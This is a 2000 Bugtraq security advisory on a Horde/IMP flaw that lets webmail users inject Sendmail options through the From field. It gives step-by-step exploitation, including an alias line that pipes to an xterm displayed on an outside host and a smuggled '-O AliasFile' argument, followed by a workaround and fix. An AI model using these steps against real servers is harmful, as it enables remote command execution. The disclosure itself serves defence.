Date: Mon, 18 Sep 2000 18:56:14 +0200 From: "Steube, Jens" <Jens.Steube@COC-AG.DE> Subject: Horde library Bug part 2 To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 * Horde Library $from Bug part 2 + How to exploit with IMP and Sendmail * Description: The Fix of the first detected problem with the $from variable in the horde library was just escaping shellchars which avoids directly executing commands. It is still possible to exploit the parsed $from line and execute commands under the uid and gid of the webserver. Tested on: Debian 2.2 (potato) others not tested yet. Release Date: 15/09/2000 Autors: Found, exploited and documentated by Jens "atomi" Steube. Fixed by Christian "thepoet" Winter. Version: Horde v1.2.1 IMP v2.2.1 The Exploit: e.g: Horde and IMP, as MTA we use Sendmail (v8.11.0) 0. The job is to send a mail to a address which is defined in an aliasfile which is manually added to Sendmail. This alias pipes to a command. 1. Logon to IMP and open a compose window. 2. Locally open a texteditor and write a line in mta-aliasfile format. after that, save it locally. line e.g: evil@localhost: "|/usr/X11R6/bin/xterm -display 192.168.4.8:0.0" (or any other command to be executed on the webserver) 3. Upload the local stored file as an attachment. 4. Open the html source-code of the compose-window and search for '/tmp'. 5. You will find the local stored filename and path of the attachment on the webserver. Copy it to the Clipboard. mind: that filename looks like /tmp/php??????.att 6. Just close the compose window! 7. Open a new compose window. 8. As your FROM-line insert: line e.g: (including all quotetypes) <"x@x -O QueueDirectory=/tmp -O AliasFile=(insert Clipboard) -Fx"> 9. As your TO-line insert the useralias, which you have defined in the uploaded attachement. e.g: evil@localhost 10. Leave all other fields blank and send the mail. 11. Exploited. Other MTAs: Above exploit works out with Sendmail in most configurations, but other MTAs could also be exploited the same way. Notice that just disabling of the AliasFile flag is not enough to prevent attacking this bug because most MTAs also provide other commandswitches to include external configuration. Workaround: The "$from" var has to be checked for "-" chars following the space character. Passing those chars unfiltered will nearly always lead to exploitable bugs or errors. As neither a mail address nor a name with a leading minus sign does make sense, here is a small patch that converts every minus at the beginning of a word into an underscore: http://ssl.coc-ag.de/sec/index.htm#horde02 Fix: Best solution would be generally not to pass vars to popen(), but rather opening the pipe to Sendmail by calling popen("$default->path_to_Sendmail -t) and putting all available information into the mail header. This requires some extra checking and converting, but secures the system a lot. Feedback: Please send suggestions, updates, and comments to mailto: security@coc-ag.net http://ssl.coc-ag.de/sec Disclaimer: The information within this document may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any consequences whatsoever arising out of or in connection with the use or spread of this information. Any use of this information lays within the user's responsibility. References: Both projects (Horde and IMP) of the horde group can be found at http://horde.org Despite those few bugs, these people there have really done a great job on free software. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBOcY5IP/VNLQKdxzWEQJK+QCg/wSA4/Dz7QgenFcLTig7ZjOlHxsAn2Zt 5WVavlN/5Z991giri/KOIl14 =eyOX -----END PGP SIGNATURE-----